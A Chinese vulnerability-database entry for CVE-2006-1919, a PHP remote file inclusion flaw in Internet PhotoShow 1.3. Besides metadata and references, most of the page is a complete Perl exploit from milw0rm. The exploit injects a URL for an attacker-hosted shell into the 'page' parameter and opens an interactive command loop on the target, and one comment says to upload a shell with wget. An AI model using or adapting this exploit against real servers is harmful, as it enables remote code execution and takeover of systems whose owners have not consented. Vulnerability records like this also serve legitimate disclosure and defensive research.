Internet Photoshow Index.PHP 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110089 漏洞类型 输入验证
发布时间 2006-04-18 更新时间 2006-04-24
CVE编号 CVE-2006-1919 CNNVD-ID CNNVD-200604-370
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1694
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-370
|漏洞详情
InternetPhotoshow1.3中的index.php存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于page参数中的URL执行任意PHP代码。
|漏洞EXP
#!/usr/bin/perl
#
# Exploit by Hessam-x (www.hessamx.net)
# sub usage()
# {
 #print " Usage: perl hx.pl [host] [cmd shell] [cmd shell variable]\r\n\n";
 #print " example : perl hx.pl www.milw0rm.com milw0rm.com/hx.txt cmd";
 #exit();
 #}
######################################################
#  ___ ___                __                         #
# /   |   \_____    ____ |  | __ ___________________ #
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
# \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ #
#       \/      \/     \/     \/    \/            \/ #
#             Iran Hackerz Security Team             #
#               WebSite: www.hackerz.ir              #
#                 DeltaHAcking Team                  #
#           website: www.deltahacking.com            #
######################################################
#  Internet PhotoShow Remote File Inclusion Exploit  #
######################################################
# upload a shell with this xpl:
# wget http://shell location/
use LWP::UserAgent;
print "-------------------------------------------\n";
print "=             Internet PhotoShow          =\n";
print "=       By Hessam-x  - www.hackerz.ir     =\n";
print "-------------------------------------------\n\n";


$bPath = $ARGV[0];
$cmdo = $ARGV[1];
$bcmd = $ARGV[2];

if($bPath!~/http:\/\// || $cmdo!~/http:\/\// || !$bcmd){usage()}



while()
{
       print "Hessam-x@PhotoShow \$";
while(<STDIN>)
       {
               $cmd=$_;
               chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$bpath.'index.php?page='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "\n[-] Could not connect !\n";

$res = $xpl->request($req);

$return = $res->content;
$return =~ tr/[\n]/[ê]/;

if (!$cmd) {print "\n[!] Please type a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/)
       {print "\n[-] Could Not Connect to cmd Host\n";exit}
elsif ($return =~/^<b>Fatal.error/) {print "\n[-] Invalid Command\n"}

if($return =~ /(.*)/)


{
       $freturn = $1;
       $freturn=~ tr/[ê]/[\n]/;
       print "\r\n$freturn\n\r";
       last;
}

else {print "Hessam-x@PhotoShow \$";}}}last;


sub usage()
 {
print "[!] Usage : hx.pl [host] [cmd shell location] [cmd shell variable]\n";
print " - E.g : hx.pl http://www.milw0rm.com http://www.milw0rm.com/shell.txt cmd\n";
 exit();
 }

# milw0rm.com [2006-04-18]
|参考资料

来源:VUPEN
名称:ADV-2006-1417
链接:http://www.frsirt.com/english/advisories/2006/1417
来源:SECUNIA
名称:19726
链接:http://secunia.com/advisories/19726
来源:MILW0RM
名称:1694
链接:http://milw0rm.com/exploits/1694
来源:XF
名称:ip-index-file-include(25937)
链接:http://xforce.iss.net/xforce/xfdb/25937
来源:BID
名称:17620
链接:http://www.securityfocus.com/bid/17620
来源:OSVDB
名称:24743
链接:http://www.osvdb.org/24743